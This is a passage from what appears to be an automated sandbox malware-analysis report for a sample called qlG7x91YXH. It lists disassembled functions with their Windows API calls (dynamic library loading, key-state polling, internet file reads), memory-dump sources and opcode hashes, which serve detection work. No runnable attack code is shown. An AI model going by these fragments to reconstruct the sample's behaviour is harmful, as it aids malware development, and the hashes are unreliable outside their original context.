                                              • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00DF8F40
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00DF8FD0
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DF8FEC
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00DF9032
                                              • FreeLibrary.KERNEL32(00000000), ref: 00DF9052
                                                • Part of subcall function 00D8F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00DE1043,?,753CE610), ref: 00D8F6E6
                                                • Part of subcall function 00D8F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00DCFA64,00000000,00000000,?,?,00DE1043,?,753CE610,?,00DCFA64), ref: 00D8F70D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                              • String ID:
                                              • API String ID: 666041331-0
                                              • Opcode ID: 34a0736047b76b27faf26d9c7238807a666becb555ae93e4797cbda5a2e289ec
                                              • Instruction ID: 69d1d70171ad1aff886a5f722aa7694b9fef2d6c8ffc6476fe4805d4afc423c5
                                              • Opcode Fuzzy Hash: 34a0736047b76b27faf26d9c7238807a666becb555ae93e4797cbda5a2e289ec
                                              • Instruction Fuzzy Hash: B6516C35A01209DFC701DF58C4949ADBBF1FF49324B09C199E90AAB362DB31ED85CBA1
                                              Function 00E06B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00E06C33
                                              • SetWindowLongW.USER32(?,000000EC,?), ref: 00E06C4A
                                              • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00E06C73
                                              • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00DEAB79,00000000,00000000), ref: 00E06C98
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00E06CC7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Long$MessageSendShow
                                              • String ID:
                                              • API String ID: 3688381893-0
                                              • Opcode ID: 8ce9b522106ce36b357b7612b1b2321d0ef6a3a21bfcc5e43da2d1f4cfd87827
                                              • Instruction ID: 9a114a3d04072217cf80ae99a9d57e627772fb9344c427265d265f53d3074369
                                              • Opcode Fuzzy Hash: 8ce9b522106ce36b357b7612b1b2321d0ef6a3a21bfcc5e43da2d1f4cfd87827
                                              • Instruction Fuzzy Hash: D0410635A00104AFEB24CF69CC98FA9BBA4EB49354F141268F995B72E0C371EDE1CA50
                                              Function 00DA2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: 3e494f626ac7851bd9daa6b0e3169f1f2ca214470fb0b76da57a030484b52f4c
                                              • Instruction ID: b68bf111bcf8e40d8fdbd4f4fd740ed4fefbc10b2a18847acb0032d784d5a1dd
                                              • Opcode Fuzzy Hash: 3e494f626ac7851bd9daa6b0e3169f1f2ca214470fb0b76da57a030484b52f4c
                                              • Instruction Fuzzy Hash: E341D172A002049FCB24DF7EC881A6EB7F5EF8A314B194569E515EB351D731ED01CBA1
                                              Function 00D8912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00D89141
                                              • ScreenToClient.USER32(00000000,?), ref: 00D8915E
                                              • GetAsyncKeyState.USER32(00000001), ref: 00D89183
                                              • GetAsyncKeyState.USER32(00000002), ref: 00D8919D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AsyncState$ClientCursorScreen
                                              • String ID:
                                              • API String ID: 4210589936-0
                                              • Opcode ID: ac46a7b7c3757b5e77c8ecdd2a6c3c2842b726e775d9a3929c36bd7709d39354
                                              • Instruction ID: 5d00a6e0fbe65a34456523a3662950f7e00c6837a053ff43d9b375af5e6e3dfd
                                              • Opcode Fuzzy Hash: ac46a7b7c3757b5e77c8ecdd2a6c3c2842b726e775d9a3929c36bd7709d39354
                                              • Instruction Fuzzy Hash: 09414D71A0860BBBDB15AF64C858BFEF7B4FB05324F284219E469A32D0C7305994CF61
                                              Function 00DE3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetInputState.USER32 ref: 00DE38CB
                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00DE3922
                                              • TranslateMessage.USER32(?), ref: 00DE394B
                                              • DispatchMessageW.USER32(?), ref: 00DE3955
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE3966
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                              • String ID:
                                              • API String ID: 2256411358-0
                                              • Opcode ID: 1c66a784bb501120044433764cd88ffa3b2f974099eb347494cc80f8a5c67f19
                                              • Instruction ID: 8e14873c02f75c9b66dce667bcc004eb0fcc1a7ea00186e757b6c8067fc6716b
                                              • Opcode Fuzzy Hash: 1c66a784bb501120044433764cd88ffa3b2f974099eb347494cc80f8a5c67f19
                                              • Instruction Fuzzy Hash: 7B31A5745043C19EEF35EB379C4DBB637A8AB46304F180559E452A3091E3A596C9CF31
                                              Function 00DECF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00DEC21E,00000000), ref: 00DECF38
                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00DECF6F
                                              • GetLastError.KERNEL32(?,00000000,?,?,?,00DEC21E,00000000), ref: 00DECFB4
                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DEC21E,00000000), ref: 00DECFC8
                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DEC21E,00000000), ref: 00DECFF2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                              • String ID:
                                              • API String ID: 3191363074-0
                                              • Opcode ID: 72e9a67defac5b006e4ac1e5516ec192f02aa178dadc1fd3aab372a2e87706ed
                                              • Instruction ID: 3adc5fd8e1c5620ce1e5b6bd2c608e7a4546e84a5122e6b53c0fcda07daf4f9f
                                              • Opcode Fuzzy Hash: 72e9a67defac5b006e4ac1e5516ec192f02aa178dadc1fd3aab372a2e87706ed
                                              • Instruction Fuzzy Hash: 7C317C71615645EFDB20EFA6C884AABBBF9EF04315B24442EF546E2110DB30EE469B70
                                              Function 00DD1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00DD1915
                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 00DD19C1
                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 00DD19C9
                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 00DD19DA
                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00DD19E2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
                                              • Opcode ID: 5a58f896a117b2b0e1c6400d70985469bb0a8f5c694f1718a4615a36f51dba62
                                              • Instruction ID: 10d01df5e9b39fca8e8eac3ed05f6140c501912faf25253cb3aca042eaf37054
                                              • Opcode Fuzzy Hash: 5a58f896a117b2b0e1c6400d70985469bb0a8f5c694f1718a4615a36f51dba62
                                              • Instruction Fuzzy Hash: 3131AD75A00219EFCB10CFA8D9A9ADE3BB5EB04315F14432AF961A72D1C770A944CFA1
                                              Function 00E05706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E05745
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E0579D
                                              • _wcslen.LIBCMT ref: 00E057AF
                                              • _wcslen.LIBCMT ref: 00E057BA
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E05816
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$_wcslen
                                              • String ID:
                                              • API String ID: 763830540-0
                                              • Opcode ID: 84639ec7b136dd56979e106584935e8fbc4edd012b2c11e0045254baee25475a
                                              • Instruction ID: 1604d9476166af1f5f399116128baf82fa31f0fd6fb8091b48d0cbbe2d13a46b
                                              • Opcode Fuzzy Hash: 84639ec7b136dd56979e106584935e8fbc4edd012b2c11e0045254baee25475a
                                              • Instruction Fuzzy Hash: 14218F36904618EADF208FA0DC84AEE77B8FF44724F109216E929BA1C0E77089C5CF61
                                              Function 00DF0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindow.USER32(00000000), ref: 00DF0951
                                              • GetForegroundWindow.USER32 ref: 00DF0968
                                              • GetDC.USER32(00000000), ref: 00DF09A4
                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00DF09B0
                                              • ReleaseDC.USER32(00000000,00000003), ref: 00DF09E8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$ForegroundPixelRelease
                                              • String ID:
                                              • API String ID: 4156661090-0
                                              • Opcode ID: e36313fe63ae59a9bab1d44741ca52e39d9724eb526444a4ca382a0a80e3a549
                                              • Instruction ID: e36b53110bd9ed318a2d33169a0b208c547aeedbac9b3c732e0c872f8e52f282
                                              • Opcode Fuzzy Hash: e36313fe63ae59a9bab1d44741ca52e39d9724eb526444a4ca382a0a80e3a549
                                              • Instruction Fuzzy Hash: 19218135600204AFD714EF65D885AAEBBF5EF48704F148169F94AA7362DB71AC44CBA0
                                              Function 00DACDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 00DACDC6
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DACDE9
                                                • Part of subcall function 00DA3820: RtlAllocateHeap.NTDLL(00000000,?,00E41444), ref: 00DA3852
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DACE0F
                                              • _free.LIBCMT ref: 00DACE22
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DACE31
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              • String ID:
                                              • API String ID: 336800556-0
                                              • Opcode ID: 7a4263831ac30ad41030af2193f81e5d137625d44ec2dc22200480757b116b35
                                              • Instruction ID: f0b5190b18b11cb462a7dd3a53feee2ffecffc0353f06f81ec6a12b20e186583
                                              • Opcode Fuzzy Hash: 7a4263831ac30ad41030af2193f81e5d137625d44ec2dc22200480757b116b35
                                              • Instruction Fuzzy Hash: 800147726122107F672117BB6C8CD3B796DDFC7BB03281229FD00E3200EA218E0181F1
                                              Function 00D89639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                              Download Yara Rule
                                              APIs
                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D89693
                                              • SelectObject.GDI32(?,00000000), ref: 00D896A2
                                              • BeginPath.GDI32(?), ref: 00D896B9
                                              • SelectObject.GDI32(?,00000000), ref: 00D896E2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: 96a3aa06df7ab3e50637350e2bb6ea44deec94463a10ee875255caec79da22ee
                                              • Instruction ID: c68bfd2233d75da9c05a3c3c7e2bc7b92cccd34c48163cca999b46f9b47729c8
                                              • Opcode Fuzzy Hash: 96a3aa06df7ab3e50637350e2bb6ea44deec94463a10ee875255caec79da22ee
                                              • Instruction Fuzzy Hash: 5B217134802305EFDF11AF66DC257B97B74BB91365F280256F560B61A0E37198DACFA0
                                              Function 00DD5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: b3dd3ddf4004d5d229b6f8fe4b9a4f6ffcdd4e2a910e3a66ef6685671dfc31cb
                                              • Instruction ID: 63e93584a7a0f0d4e23de71208c070de31638c5e68db19b8dddeb93ae26a7588
                                              • Opcode Fuzzy Hash: b3dd3ddf4004d5d229b6f8fe4b9a4f6ffcdd4e2a910e3a66ef6685671dfc31cb
                                              • Instruction Fuzzy Hash: C501926564170AFAE6185510AD82FBA735CDB21394B244022FD14AA785F661ED6086B4
                                              Function 00DA2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,00D9F2DE,00DA3863,00E41444,?,00D8FDF5,?,?,00D7A976,00000010,00E41440,00D713FC,?,00D713C6), ref: 00DA2DFD
                                              • _free.LIBCMT ref: 00DA2E32
                                              • _free.LIBCMT ref: 00DA2E59
                                              • SetLastError.KERNEL32(00000000,00D71129), ref: 00DA2E66
                                              • SetLastError.KERNEL32(00000000,00D71129), ref: 00DA2E6F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              • API String ID: 3170660625-0
                                              • Opcode ID: 564f89531f80c5e979cd7ec1be7cbc40cbe7f61fe21ce710ba50d82e81732851
                                              • Instruction ID: 08656b00cde4fcf5778cd19b554f325b5773cc2f27b8fa44b74ffb6942edd344
                                              • Opcode Fuzzy Hash: 564f89531f80c5e979cd7ec1be7cbc40cbe7f61fe21ce710ba50d82e81732851
                                              • Instruction Fuzzy Hash: 2501F4322456006FC612273F6C4AE3B266AEBD37B1B384128F465F21D2EB79CE854130
                                              Function 00DD000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CLSIDFromProgID.COMBASE ref: 00DD002B
                                              • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DD0046
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DCFF41,80070057,?,?), ref: 00DD0054
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00DD0064
                                              • CLSIDFromString.COMBASE(?,?), ref: 00DD0070
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              • Opcode ID: c36aa03c84fcaf80cff0376827fddea116ba06a744ad10f193de8647febe5c0b
                                              • Instruction ID: 6a9fbf52b323aab9dd0a9e265b540d11b9667e3ae8972580642290f4e501a7db
                                              • Opcode Fuzzy Hash: c36aa03c84fcaf80cff0376827fddea116ba06a744ad10f193de8647febe5c0b
                                              • Instruction Fuzzy Hash: D0018F72600204BFDB104F69DC04BBA7EADEB84752F248225F905E2210D776DD848BB0
                                              Function 00DDE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                              Download Yara Rule
                                              APIs
